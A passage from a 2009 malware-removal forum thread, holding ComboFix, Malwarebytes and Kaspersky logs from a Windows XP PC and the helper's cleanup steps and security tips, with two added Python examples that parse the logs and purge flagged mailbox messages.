08/31/2000 08:00 AM 36201 c:\combo-fix\ffdefstr.dll
08/31/2000 08:00 AM 36201 \RP413\A0079061.dll

07/20/2009 09:21 AM 2202 c:\combo-fix\files.pif
07/20/2009 09:21 AM 2202 \RP413\A0079062.pif

07/20/2009 02:58 AM 28011 c:\combo-fix\FIND3M.bat
07/20/2009 02:58 AM 28011 \RP413\A0079063.bat

07/20/2009 09:21 AM 4668 c:\combo-fix\FIXLSP.bat
07/20/2009 09:21 AM 4668 \RP413\A0079064.bat

05/25/2009 10:05 AM 1095 c:\combo-fix\FKMGen.cmd
05/25/2009 10:05 AM 1095 \RP413\A0079065.cmd

02/15/2001 03:03 PM 10240 c:\combo-fix\ForceLibrary.dll
02/15/2001 03:03 PM 10240 \RP413\A0079066.dll

06/23/2009 03:20 PM 5396 c:\combo-fix\GetHive.cmd
06/23/2009 03:20 PM 5396 \RP413\A0079067.cmd

08/16/2005 01:54 AM 1536 c:\combo-fix\hidec.exe
08/16/2005 01:54 AM 1536 \RP413\A0079068.exe

05/01/2009 03:08 AM 915 c:\combo-fix\history.bat
05/01/2009 03:08 AM 915 \RP413\A0079069.bat

c:\combo-fix\Install-RC.cmd
07/13/2009 07:31 AM 5651 \RP413\A0079070.cmd

08/31/2000 08:00 AM 754 c:\combo-fix\katch.cmd
08/31/2000 08:00 AM 754 \RP413\A0079071.cmd

c:\combo-fix\Kill-All.cmd
07/13/2009 07:31 AM 1588 \RP413\A0079072.cmd

05/26/2009 11:27 PM 3434 c:\combo-fix\Kollect.bat
05/26/2009 11:27 PM 3434 \RP413\A0079073.bat

07/20/2009 09:46 AM 192699 c:\combo-fix\Lang.bat
07/20/2009 07:41 AM 192441 \RP413\A0079074.bat

c:\combo-fix\List-B.bat
07/20/2009 09:11 AM 35049 \RP413\A0079075.bat

c:\combo-fix\List-C.bat
07/20/2009 03:02 AM 218579 \RP413\A0079076.bat

c:\combo-fix\List-D.bat
07/10/2009 04:58 AM 92326 \RP413\A0079077.bat

c:\combo-fix\List.bat
07/20/2009 07:33 AM 595954 \RP413\A0079078.bat

08/31/2000 08:00 AM 2428 c:\combo-fix\lnkread.vbs
08/31/2000 08:00 AM 2428 \RP413\A0079079.vbs

07/20/2009 09:36 AM 5032 c:\combo-fix\md5sum.pif
07/20/2009 09:21 AM 4760 \RP413\A0079080.pif

07/13/2009 12:50 AM 2359 c:\combo-fix\MoveIt.bat
07/13/2009 12:50 AM 2359 \RP413\A0079081.bat

04/20/2009 12:56 PM 31232 c:\combo-fix\n.pif
04/20/2009 12:56 PM 31232 \RP413\A0079082.pif

07/19/2009 07:55 AM 14751 c:\combo-fix\ND_.bat
07/19/2009 07:55 AM 14751 \RP413\A0079083.bat

04/20/2009 12:56 PM 31232 c:\combo-fix\NircmdB.exe
04/20/2009 12:56 PM 31232 \RP413\A0079084.exe

07/16/2009 03:14 AM 14737 c:\combo-fix\NT-OS.cmd
07/16/2009 03:14 AM 14737 \RP413\A0079085.cmd

08/31/2000 08:00 AM 977 c:\combo-fix\OSid.vbs
08/31/2000 08:00 AM 977 \RP413\A0079086.vbs

07/13/2009 05:48 AM 219648 c:\combo-fix\pev.exe
07/13/2009 05:48 AM 219648 \RP413\A0079087.exe

07/13/2009 07:31 AM 61738 c:\combo-fix\RegScan.cmd
07/13/2009 07:31 AM 61738 \RP413\A0079089.cmd

c:\combo-fix\restore_pt.vbs
05/01/2009 10:26 PM 587 \RP413\A0079090.vbs

08/31/2000 08:00 AM 241 c:\combo-fix\Rkey.cmd
08/31/2000 08:00 AM 241 \RP413\A0079091.cmd

06/27/2009 01:46 AM 12571 c:\combo-fix\SetEnvmt.bat
06/27/2009 01:46 AM 12571 \RP413\A0079092.bat

07/20/2009 09:34 AM 69 c:\combo-fix\sfx.cmd
07/20/2009 09:32 AM 14 \RP413\A0079093.cmd

c:\combo-fix\SnapShot.cmd
06/29/2009 08:35 PM 3344 \RP413\A0079094.cmd

07/13/2009 07:31 AM 2127 c:\combo-fix\SRestore.cmd
07/13/2009 07:31 AM 2127 \RP413\A0079095.cmd

06/30/2009 01:24 AM 18788 c:\combo-fix\SuppScan.cmd
06/30/2009 01:24 AM 18788 \RP413\A0079096.cmd

08/31/2000 08:00 AM 2176 c:\combo-fix\SvcDrv.vbs
08/31/2000 08:00 AM 2176 \RP413\A0079097.vbs

c:\combo-fix\Update-CF.cmd
07/13/2009 07:31 AM 2734 \RP413\A0079099.cmd
07/13/2009 07:31 AM 2734 \RP413\A0079103.cmd

c:\combo-fix\w_sock.dll
06/21/2009 02:45 PM 98948 \RP413\A0079102.dll

c:\combo-fix\w2k_sock.dll
06/21/2009 03:34 PM 90202 \RP413\A0079100.dll
06/21/2009 03:34 PM 90202 \RP413\A0079104.dll

05/14/2009 01:08 AM 592 c:\combo-fix\Wmi_rem.vbs
05/14/2009 01:08 AM 592 \RP413\A0079101.vbs

06/23/2009 03:55 PM 3561743 c:\documents and settings\All Users\Application Data\Malwarebytes\Malwarebytes' Anti-Malware\mbam-setup.exe
05/01/2009 02:18 PM 2967799 \RP402\A0066733.exe

05/08/2007 08:03 PM 34308 c:\documents and settings\John B\Application Data\Macromedia\Shockwave Player\xtras\download\AndradeArts\Music\BASSMOD.dll
05/08/2007 08:03 PM 34308 \RP376\A0063153.dll
05/08/2007 08:03 PM 34308 \RP405\A0066823.dll

c:\documents and settings\John B\Application Data\pidle\pidle.exe
\RP376\A0063111.exe

c:\documents and settings\John B\igLoader Files\MasterKickMiniClip\igUninst.exe
05/06/2006 08:44 AM 18432 \RP381\A0065633.exe

c:\documents and settings\John B\igLoader Files\MasterKickMiniClip\MasterKickMiniClip.dll
05/26/2006 11:07 PM 3457024 \RP381\A0065627.dll

04/13/2008 07:12 PM 26624 c:\documents and settings\LocalService\Application Data\Microsoft\UPnP Device Host\upnphost\udhisapi.dll
04/13/2008 07:12 PM 26624 \RP372\A0062954.dll
\RP406\A006
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ctfmon.exe"="c:\windows\system32\ctfmon.exe" [2008-04-14 15360]
"updateMgr"="c:\program files\Adobe\Acrobat 7.0\Reader\AdobeUpdateManager.exe" [2006-03-30 313472]
"Trackstick Manager.exe"="c:\program files\Trackstick Manager\Trackstick Manager.EXE" [2009-04-01 2809856]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"avast!"="c:\progra~1\ALWILS~1\Avast4\ashDisp.exe" [2009-02-05 81000]
"SunJavaUpdateSched"="c:\program files\Java\jre6\bin\jusched.exe" [2009-06-24 148888]
"TPSMain"="TPSMain.exe" - c:\windows\system32\TPSMain.exe [2003-11-20 278528]
"AGRSMMSG"="AGRSMMSG.exe" - c:\windows\agrsmmsg.exe [2003-04-18 88363]
"TFNF5"="TFNF5.exe" - c:\windows\system32\TFNF5.exe [2003-10-16 73728]

c:\documents and settings\All Users\Start Menu\Programs\Startup\
00THotkey.exe [2003-4-15 258048]
Belkin N Wireless USB Adapter Client Utility.lnk - c:\program files\Belkin\F5D8053\v5\Belkinwcui.exe [2009-5-7 1605632]
RAMASST.lnk - c:\windows\system32\RAMASST.exe [2003-11-20 155648]

[HKEY_USERS\.default\software\microsoft\windows\currentversion\policies\explorer]
"NoSetActiveDesktop"= 1 (0x1)
"NoActiveDesktopChanges"= 1 (0x1)

[HKLM\~\startupfolder\C:^Documents and Settings^John B^Start Menu^Programs^Startup^Registration Silent Hunter III.LNK]
path=c:\documents and settings\John B\Start Menu\Programs\Startup\Registration Silent Hunter III.LNK
backup=c:\windows\pss\Registration Silent Hunter III.LNKStartup

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run-disabled]
"Microsoft Works Update Detection"=c:\program files\Common Files\Microsoft Shared\Works Shared\WkUFind.exe
"hpbdfawep"=c:\program files\HP\Dfawep\bin\hpbdfawep.exe 1
"ArcSoft Connection Service"=c:\program files\Common Files\ArcSoft\Connection Service\Bin\ACDaemon.exe
"TouchED"=c:\program files\TOSHIBA\TouchED\TouchED.Exe
"Apoint"=c:\program files\Apoint2K\Apoint.exe

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"c:\\Program Files\\Smart PC Solutions\\Startup Booster\\StartupBooster.exe"=

R0 BsStor;B.H.A Storage Helper Driver;c:\windows\system32\drivers\BsStor.sys [11/20/2003 8:52 PM 9344]
R1 aswSP;avast! Self Protection;c:\windows\system32\drivers\aswSP.sys [5/6/2009 11:01 AM 114768]
R2 aswFsBlk;aswFsBlk;c:\windows\system32\drivers\aswFsBlk.sys [5/6/2009 11:01 AM 20560]
R2 EAPPkt;Realtek EAPPkt Protocol;c:\windows\system32\drivers\EAPPkt.sys [5/7/2009 12:13 PM 38144]
R4 BsUDF;B.H.A UDF Filesystem;c:\windows\system32\drivers\BsUDF.sys [11/20/2003 8:52 PM 390400]
S2 gupdate1c9a0d0dfd66502;Google Update Service (gupdate1c9a0d0dfd66502);c:\program files\Google\Update\GoogleUpdate.exe [3/9/2009 11:05 AM 133104]
S2 mrtRate;mrtRate; [x]
S3 APL531;CRS Photo Scanner;c:\windows\system32\drivers\ov550i.sys [1/28/2008 8:53 AM 580992]
S3 GWIOPM;gwiopm;c:\program files\LEA Digital Recorder\gwiopm.sys [6/16/2003 10:15 AM 3904]
S3 NPF;NetGroup Packet Filter Driver;c:\windows\system32\drivers\npf.sys [11/6/2007 3:22 PM 34064]
S3 rt2870;Ralink 802.11n USB Wireless LAN Card Driver;c:\windows\system32\drivers\rt2870.sys [3/13/2007 4:35 AM 476416]
S3 RTL8187B;TRENDnet TEW-424UB Wireless 802.11g 54Mbps USB 2.0 Network Adapter;c:\windows\system32\DRIVERS\RTL8187B.sys --> c:\windows\system32\DRIVERS\RTL8187B.sys [?]
S3 SUSTUCAM;Susteen USB Cable Modem Driver;c:\windows\system32\drivers\sustucam.sys [4/12/2006 2:01 PM 38016]
S3 WlanUIB;NETGEAR 802.11b USB Driver;c:\windows\system32\drivers\MA111nd5.sys [3/3/2004 4:27 PM 666624]
.
Contents of the 'Scheduled Tasks' folder

2009-07-15 c:\windows\Tasks\AppleSoftwareUpdate.job
- c:\program files\Apple Software Update\SoftwareUpdate.exe [2007-08-29 20:57]

2009-07-20 c:\windows\Tasks\GlaryInitialize.job
- c:\program files\Glary Utilities\initialize.exe [2008-11-17 21:55]

2009-07-20 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\program files\Google\Update\GoogleUpdate.exe [2009-03-09 16:05]

2009-07-17 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job
- c:\program files\Google\Update\GoogleUpdate.exe [2009-03-09 16:05]
.
.
------- Supplementary Scan -------
.
mStart Page = about:blank
uInternet Connection Wizard,ShellNext = iexplore
uInternet Settings,ProxyOverride = <local>
Trusted Zone: aol.com\free
DPF: {7D731A83-6C80-4EA4-9646-5E06A0513274} - hxxp://www.shockwave.com/content/barnyardinvasion/slgwebinstall.cab
DPF: {87056D28-9730-4A47-B9F9-7E890B62C58A} - hxxp://www.shockwave.com/content/tumblebugs/axhost.cab
FF - ProfilePath - c:\documents and settings\John B\Application Data\Mozilla\Firefox\Profiles\ghtrl0km.default\
FF - prefs.js: browser.startup.homepage - www.yahoo.com
FF - prefs.js: network.proxy.type - 4
FF - plugin: c:\program files\Google\Update\1.2.183.7\npGoogleOneClick8.dll
FF - plugin: c:\program files\Mozilla Firefox\plugins\np-mswmp.dll
FF - plugin: c:\program files\Mozilla Firefox\plugins\npigl.dll
FF - plugin: c:\program files\Mozilla Firefox\plugins\npvirtools.dll
FF - plugin: c:\program files\Unity\WebPlayer\loader\npUnity3D32.dll
FF - plugin: c:\program files\Viewpoint\Viewpoint Experience Technology\npViewpoint.dll
.

**************************************************************************

catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2009-07-20 09:51
Windows 5.1.2600 Service Pack 3 NTFS

scanning hidden processes ...

scanning hidden autostart entries ...

scanning hidden files ...

scan completed successfully
hidden files: 0

**************************************************************************
.
--------------------- LOCKED REGISTRY KEYS ---------------------

[HKEY_USERS\S-1-5-21-3966931221-871848139-187226989-1006\Software\Microsoft\SystemCertificates\AddressBook*]
@Allowed: (Read) (RestrictedCode)
@Allowed: (Read) (RestrictedCode)
.
--------------------- DLLs Loaded Under Running Processes ---------------------

- - - - - - - > 'explorer.exe'(348)
c:\program files\Common Files\Microsoft Shared\Ink\PENUSA.DLL
c:\windows\system32\WPDShServiceObj.dll
c:\program files\ArcSoft\Software Suite\PhotoImpression\share\pihook.dll
c:\windows\system32\we.dll
c:\windows\system32\TPwrCfg.DLL
c:\windows\system32\TPwrReg.dll
c:\windows\system32\TPSTrace.DLL
c:\windows\system32\PortableDeviceTypes.dll
c:\windows\system32\PortableDeviceApi.dll
.
------------------------ Other Running Processes ------------------------
.
c:\program files\Alwil Software\Avast4\aswUpdSv.exe
c:\program files\Alwil Software\Avast4\ashServ.exe
c:\program files\Common Files\ArcSoft\Connection Service\Bin\ACService.exe
c:\windows\system32\drivers\CDAC11BA.EXE
c:\program files\Toshiba\ConfigFree\CFSvcs.exe
c:\windows\system32\DVDRAMSV.exe
c:\program files\Java\jre6\bin\jqs.exe
c:\program files\Common Files\Microsoft Shared\VS7Debug\mdm.exe
c:\windows\system32\HPZipm12.exe
c:\program files\Analog Devices\SoundMAX\SMAgent.exe
c:\program files\Canon\CAL\CALMAIN.exe
c:\windows\system32\spool\drivers\w32x86\3\HP1006MC.EXE
c:\windows\system32\TPSBattM.exe
c:\documents and settings\All Users\Start Menu\Programs\Startup\00THotkey.exe
c:\windows\system32\wscntfy.exe
.
**************************************************************************
.
Completion time: 2009-07-20 10:11 - machine was rebooted
ComboFix-quarantined-files.txt 2009-07-20 15:11

Pre-Run: 9,063,346,176 bytes free
Post-Run: 8,943,685,632 bytes free

Current=4 Default=4 Failed=3 LastKnownGood=5 Sets=1,2,3,4,5
387 --- E O F --- 2009-07-15 17:53
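ComboFix's "Reg Loading Points" section is where a helper checks what will run at the next boot. Two patterns in the log above deserve a second look: Run values that are bare file names (`"TPSMain"="TPSMain.exe"`), which Windows resolves through the executable search path and which a same-named file earlier in that path could hijack, and services whose binary ComboFix could not find (`S2 mrtRate;mrtRate; [x]`, and the `[?]` on RTL8187B), which are either leftovers of uninstalled software or a service entry for something already removed. As an added example, not code from the thread or from ComboFix, the Python below parses those two line formats and reports both patterns. The sample is copied from the log above; reading `[x]`/`[?]` as "file not found on disk" is my interpretation of ComboFix's output.

```python
import re
from dataclasses import dataclass

# Sample input: lines copied from the "Reg Loading Points" section of the
# ComboFix log posted above.
SAMPLE_LOG = r"""
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ctfmon.exe"="c:\windows\system32\ctfmon.exe" [2008-04-14 15360]
"updateMgr"="c:\program files\Adobe\Acrobat 7.0\Reader\AdobeUpdateManager.exe" [2006-03-30 313472]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"avast!"="c:\progra~1\ALWILS~1\Avast4\ashDisp.exe" [2009-02-05 81000]
"TPSMain"="TPSMain.exe" - c:\windows\system32\TPSMain.exe [2003-11-20 278528]
"AGRSMMSG"="AGRSMMSG.exe" - c:\windows\agrsmmsg.exe [2003-04-18 88363]
"TFNF5"="TFNF5.exe" - c:\windows\system32\TFNF5.exe [2003-10-16 73728]

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run-disabled]
"Microsoft Works Update Detection"=c:\program files\Common Files\Microsoft Shared\Works Shared\WkUFind.exe

R0 BsStor;B.H.A Storage Helper Driver;c:\windows\system32\drivers\BsStor.sys [11/20/2003 8:52 PM 9344]
R1 aswSP;avast! Self Protection;c:\windows\system32\drivers\aswSP.sys [5/6/2009 11:01 AM 114768]
S2 gupdate1c9a0d0dfd66502;Google Update Service (gupdate1c9a0d0dfd66502);c:\program files\Google\Update\GoogleUpdate.exe [3/9/2009 11:05 AM 133104]
S2 mrtRate;mrtRate; [x]
S3 NPF;NetGroup Packet Filter Driver;c:\windows\system32\drivers\npf.sys [11/6/2007 3:22 PM 34064]
S3 RTL8187B;TRENDnet TEW-424UB Wireless 802.11g 54Mbps USB 2.0 Network Adapter;c:\windows\system32\DRIVERS\RTL8187B.sys --> c:\windows\system32\DRIVERS\RTL8187B.sys [?]
"""

KEY_RE = re.compile(r"^\[(?P<key>HK[^\]]+)\]$")
# "name"="value" [date size]   or   "name"="bare.exe" - resolved\path [date size]
RUN_RE = re.compile(r'^"(?P<name>[^"]+)"="(?P<value>[^"]*)"(?: - (?P<resolved>.+?))? \[(?P<meta>[^\]]*)\]$')
# R0/R1/R2/S2/S3 name;description;path [date time size]
SVC_RE = re.compile(r"^(?P<start>[RS]\d) (?P<name>[^;]+);(?P<desc>[^;]*);(?P<rest>.*)$")


@dataclass
class Finding:
    kind: str
    name: str
    detail: str


def review_loading_points(text):
    """Walk the Run keys and service list and return the entries worth a look."""
    findings = []
    current_key = ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        k = KEY_RE.match(line)
        if k:
            current_key = k["key"]
            continue
        r = RUN_RE.match(line)
        if r:
            # Only live Run keys matter; run-disabled entries never execute.
            if current_key.lower().endswith("\\run") and "\\" not in r["value"]:
                findings.append(Finding(
                    "autorun-no-path", r["name"],
                    f"{r['value']} is located via the search path (ComboFix resolved it to {r['resolved']})"))
            continue
        s = SVC_RE.match(line)
        if s:
            rest = s["rest"].strip()
            # Assumption: ComboFix prints [x] or [?] when the service binary is not on disk.
            if rest.endswith(("[x]", "[?]")):
                findings.append(Finding("service-missing-file", s["name"], rest))
    return findings


if __name__ == "__main__":
    for f in review_loading_points(SAMPLE_LOG):
        print(f"{f.kind:22} {f.name:12} {f.detail}")
```

On the sample this flags the three Toshiba/Agere autoruns that rely on the search path and the two services with no binary. Neither finding is malware by itself (the three bare names resolve to files in system32 and the Windows directory, where the helper would expect them), but a service pointing at nothing is the shape TOSSMBNT had before the script removed it, and a Run value with no path is the shape an attacker uses to hide a replacement.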

#43 Transience (Unofficial Music Guru, Retired Staff, 2,448 posts)
Just a final check and then you should be good to go.

First we'll clean out your unnecessary temp files to speed up the scans:

1. TFC
  • Please download TFC to your desktop.
  • Save any work, then close all open windows.
  • Double-click TFC to run it, and allow the program to complete its run, which should not take more than a couple of minutes.
  • You may or may not be prompted to reboot; if you are, click "Yes" and allow the computer to reboot.
  • Close TFC when it has completed.
2. Malwarebytes' Anti-Malware

Please download Malwarebytes' Anti-Malware from here.

Double-click mbam-setup.exe to install the program.
  • Make sure a checkmark is placed next to Update Malwarebytes' Anti-Malware and Launch Malwarebytes' Anti-Malware at the end of setup, then click Finish.
  • If an update is found, it will download and install the latest version.
  • Once the program has loaded, select Perform Full Scan, then click Scan.
  • The scan is different from the quick scan and will take a fairly long time to finish (you can leave it to run and go do something else), please be patient.
  • When the scan is complete, click OK, then Show Results to view the results.
  • Make sure that everything is checked, and click Remove Selected.
  • When disinfection is completed, a log will open in Notepad and you may be prompted to restart.
  • The log is automatically saved by MBAM and can be viewed by clicking the Logs tab.
  • Copy & Paste the entire report in your next reply.
3. Kaspersky Online Scan

Kaspersky online scanner uses Java technology to perform the scan. Because your Java is out of date, we need to update it first so that the scan will run without issues.

Update Java

Please download JavaRa to your desktop and unzip it to its own folder
  • Run JavaRa.exe, pick the language of your choice and click Select. Then click Remove Older Versions.
  • Accept any prompts. A log will appear (JavaRa.log), DO NOT post this log, I have no need for it.
  • Open JavaRa.exe again and select Search For Updates.
  • Select Update Using Sun Java's Website then click Search and click on the Open Webpage button. Download and install the latest Java Runtime Environment (JRE) version for your computer.
Scan
  • Follow this link to the Kaspersky WebScanner
  • Read through the requirements and privacy statement and click on Accept button.
  • It will start downloading and installing the scanner and virus definitions. You will be prompted to install an application from Kaspersky. Click Run.
  • When the downloads have finished, click on Settings.
  • Make sure the following is checked.
    • Spyware, Adware, Dialers, and other potentially dangerous programs
      Archives
      Mail databases
  • Click on My Computer under Scan.
  • Once the scan is complete, it will display the results. Click on View Scan Report.
  • You will see a list of infected items there. Click on Save Report As....
  • Save this report to a convenient place. Change the Files of type to Text file (.txt) before clicking on the Save button.
  • Please post this log in your next reply.
So post back with the logs from MBAM and Kaspersky when you have them and give me an update on how the PC is running, and we should have you on your way :).

- Dave

#44 Aoc (Member, Topic Starter, 36 posts)
Avast found a virus on reboot after TFC: gUninst.exe, moved to vault.





Malwarebytes' Anti-Malware 1.39
Database version: 2421
Windows 5.1.2600 Service Pack 3

7/20/2009 11:48:15 AM
mbam-log-2009-07-20 (11-48-15).txt

Scan type: Quick Scan
Objects scanned: 100205
Time elapsed: 11 minute(s), 4 second(s)

Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 0
Registry Values Infected: 0
Registry Data Items Infected: 0
Folders Infected: 0
Files Infected: 0

Memory Processes Infected:
(No malicious items detected)

Memory Modules Infected:
(No malicious items detected)

Registry Keys Infected:
(No malicious items detected)

Registry Values Infected:
(No malicious items detected)

Registry Data Items Infected:
(No malicious items detected)

Folders Infected:
(No malicious items detected)

Files Infected:
(No malicious items detected)



--------------------------------------------------------------------------------
KASPERSKY ONLINE SCANNER 7.0 REPORT
Tuesday, July 21, 2009
Operating System: Microsoft Windows XP Home Edition Service Pack 3 (build 2600)
Kaspersky Online Scanner version: 7.0.26.13
Program database last update: Monday, July 20, 2009 20:28:43
Records in database: 2501463
--------------------------------------------------------------------------------

Scan settings:
Scan using the following database: extended
Scan archives: yes
Scan mail databases: yes

Scan area - My Computer:
C:\
D:\

Scan statistics:
Files scanned: 88590
Threat name: 4
Infected objects: 4
Suspicious objects: 4
Duration of the scan: 02:41:36


File name / Threat name / Threats count
C:\Documents and Settings\John B\Application Data\Thunderbird\Profiles\qhyabnx5.default\Mail\Local Folders\Inbox Suspicious: Trojan-Spy.HTML.Fraud.gen 4
C:\QooBox\Quarantine\C\WINDOWS\Installer\596ea64.msi.vir Infected: Trojan.Win32.Crot.a 1
C:\QooBox\Quarantine\[4]-Submit_2009-07-20_09.37.07.zip Infected: not-a-virus:AdWare.Win32.Virtumonde.rnh 1
C:\QooBox\Quarantine\[4]-Submit_2009-07-20_09.37.07.zip Infected: not-a-virus:PSWTool.Win32.Cain.284 2

The selected area was scanned.



Things seem to be running pretty good at this time.
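The Kaspersky report above lists four items. Three sit under C:\QooBox\Quarantine, ComboFix's quarantine folder, so they are inert copies of what the fix already pulled off the system. The fourth is different in kind: the path is Thunderbird's Inbox mbox file, and Trojan-Spy.HTML.Fraud.gen is Kaspersky's generic verdict for phishing HTML, so the finding means four phishing messages are stored in the mailbox, not that executable code is present. Deleting the Inbox file would discard all the mail in it; the practical follow-up is to delete those messages in the mail client and compact the folder. As an added example, not part of the thread, the Python below classifies each report line by where the detection lives and shows the mbox-level removal with the standard-library mailbox module on a constructed three-message mailbox. The quarantine-folder markers and the Message-IDs are my assumptions.

```python
import mailbox
import os
import re
import tempfile
from email.message import EmailMessage

# Sample input: the detection lines copied from the Kaspersky report above.
REPORT = r"""
C:\Documents and Settings\John B\Application Data\Thunderbird\Profiles\qhyabnx5.default\Mail\Local Folders\Inbox Suspicious: Trojan-Spy.HTML.Fraud.gen 4
C:\QooBox\Quarantine\C\WINDOWS\Installer\596ea64.msi.vir Infected: Trojan.Win32.Crot.a 1
C:\QooBox\Quarantine\[4]-Submit_2009-07-20_09.37.07.zip Infected: not-a-virus:AdWare.Win32.Virtumonde.rnh 1
C:\QooBox\Quarantine\[4]-Submit_2009-07-20_09.37.07.zip Infected: not-a-virus:PSWTool.Win32.Cain.284 2
"""

# path  Infected|Suspicious: threat-name  count
DETECTION_RE = re.compile(
    r"^(?P<path>.+?)\s+(?P<verdict>Infected|Suspicious):\s+(?P<threat>\S+)\s+(?P<count>\d+)$"
)

# Assumption: quarantine folders of the tools used in this thread (ComboFix's
# QooBox and Dr.Web CureIt); anything under them is an inert, renamed copy.
QUARANTINE_MARKERS = ("c:\\qoobox\\quarantine\\", "\\doctorweb\\quarantine\\")


def classify(path):
    """Say whether a detection is in quarantine, inside a mail store, or live on disk."""
    p = path.lower()
    if any(marker in p for marker in QUARANTINE_MARKERS):
        return "quarantined"
    if "\\thunderbird\\" in p and "\\mail\\" in p:
        return "mail-store"      # an mbox file: messages, not executable code
    return "live"


def parse_report(text):
    rows = []
    for line in text.splitlines():
        m = DETECTION_RE.match(line.strip())
        if m:
            rows.append({"path": m["path"], "verdict": m["verdict"], "threat": m["threat"],
                         "count": int(m["count"]), "where": classify(m["path"])})
    return rows


def purge_messages(mbox_path, message_ids):
    """Delete the messages whose Message-ID is in message_ids and rewrite the mbox
    in place. The mail client must be closed while this runs."""
    box = mailbox.mbox(mbox_path)
    removed = 0
    for key in list(box.keys()):
        if box[key].get("Message-ID", "").strip() in message_ids:
            box.remove(key)
            removed += 1
    box.flush()
    box.close()
    return removed


def demo_mailbox():
    """Constructed three-message mailbox; the middle one plays the phishing mail."""
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "Inbox")
        box = mailbox.mbox(path)
        for i, subject in enumerate(["Invoice", "Account verification required", "Lunch?"]):
            msg = EmailMessage()
            msg["From"] = "sender@example.com"
            msg["To"] = "john@example.com"
            msg["Subject"] = subject
            msg["Message-ID"] = f"<msg{i}@example.com>"   # assumed identifiers
            msg.set_content(f"body of message {i}")
            box.add(msg)
        box.flush()
        box.close()
        removed = purge_messages(path, {"<msg1@example.com>"})
        remaining = len(mailbox.mbox(path))
        return removed, remaining


if __name__ == "__main__":
    for row in parse_report(REPORT):
        print(f"{row['where']:11} {row['threat']} x{row['count']}  {row['path']}")
    print("demo mailbox: removed %d, %d left" % demo_mailbox())
```

Thunderbird's Local Folders files are plain mbox, which is why the standard mailbox module can rewrite one; in practice you would find the offending Message-IDs by searching the folder for the messages the scanner complained about. Rewriting the file drops the message bodies, so a subsequent scan of the Inbox comes back clean without touching any other mail.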

#45 Transience (Unofficial Music Guru, Retired Staff, 2,448 posts)
Logs look fine, those Kaspersky detections are already in quarantine and harmless.

We have a couple last things to take care of and then you're good to go.

Uninstall ComboFix and its traces from your computer
  • Click on Start > Run
  • Type Combofix /u in the run box and click Ok. Note the space between the x and the /u, it needs to be there.
    (image: the Run box with Combofix /u typed in)
Over the course of the fix you've used a variety of special tools to help with the cleaning process - none of these are of any use to you now that you're clean, and it's best not to have them hanging around on your computer. OTCleanIt is a small program that removes all the leftover tools and logs from cleanup of malware.

Remove the tools we used
  • Download OTC to your desktop and run it
  • Click Yes to begin the Cleanup process and remove these components, including this application.
  • You will be asked to reboot the machine to finish the Cleanup process. Choose Yes.
Here are some tips to reduce the potential for malware infection in the future; I strongly recommend that you read them and take them to heart so that you don't have to endure the process of cleaning your computer again.

Make proper use of your antivirus and firewall
Antivirus and firewall programs are integral to your computer security. However, just having them installed isn't enough. The definitions of these programs are frequently updated to detect the latest malware, and if you don't keep up with these updates then you'll be vulnerable to infection. Many antivirus and firewall programs have automatic update features; make use of those if you can. If your program doesn't, then get in the habit of routinely performing manual updates, because it's important.

You should keep your antivirus and firewall guard enabled at all times, don't shut them off unless there's a specific reason to do so. Also, regularly performing a full system scan with your antivirus program is a good idea to make sure nothing has slipped through your protection. Once a week works well for many people. You can set the scan to run during a time when you don't plan to use the computer and just leave it to complete on its own.

If you don't have a firewall, here are some excellent free options you can test out: Online Armor, Outpost, and ZoneAlarm. I'd highly recommend that you install one of those. If you do decide to use a 3rd party firewall program, please be sure to disable the Windows firewall as per these instructions so they don't conflict:
  • Please click on Start -> Control Panel
  • Double click Windows Firewall
  • Click Change Settings
  • Choose Off to disable Windows Firewall.
Finally, for a great tutorial on how to get the best protection out of your firewall, visit this link.

Use a safer web browser
Internet Explorer is not the most secure tool for browsing the web. It has been known to be very susceptible to infection, and there are a couple of good free alternatives: Firefox and Opera. Both are excellent: faster, safer, more powerful and functional free alternatives to Internet Explorer. It's definitely worth the short period of adjustment to start using one of these. If you wish to continue using Internet Explorer, it would be a good idea to follow the tutorial here, which will help you to make IE much safer.

If you decide to use Firefox, a couple add-ons that will nicely help to enhance your security are:

  • McAfee SiteAdvisor: A great Firefox add-on that puts McAfee's database of tested sites at your fingertips so you can know whether or not that link you're about to click is safe.
  • NoScript: This add-on helps to block malicious scripts and in general gives you much better control over what types of things webpages can do to your computer while you're browsing.

Be careful
Having security programs installed is very helpful to you, but none of them have the gift of human thought. The best way to make sure you don't get infected is to exercise common sense. Be careful of what websites you visit - if a site looks suspicious, trust your instincts and get out of there. Be careful of what attachments you open in emails and files you download from websites - check them over carefully and look at the file extensions to make sure that you know what you're getting. Using peer-to-peer file sharing programs or downloading cracks and keygens is something else to avoid - the files you will be downloading are infected in a vast majority of cases, and the benefits simply aren't worth the risk to your computer.

Keep up on Windows updates
Along with keeping all of the security programs that you choose to use updated, it is also important to keep up on system updates from Microsoft, as these patch critical security vulnerabilities and help to keep you safe. Typically the Windows Update icon will appear in your taskbar when new updates are available; whenever you see it you should open the menu up and install the updates that are available. Although it may be an annoyance, that little bit of extra time it takes to stay updated is very well worth it instead of getting infected from an exploit and having to clean your PC again.

Slow computer?
If your computer begins to slow down again in the future for no particular reason, your first step should not be to come back to the malware forum. As your computer ages and is used, its parts wear, files and programs accumulate, and its performance can decrease. To restore your computer's performance to its best possible level, follow the steps in this page written by malware expert Miekiemoes.

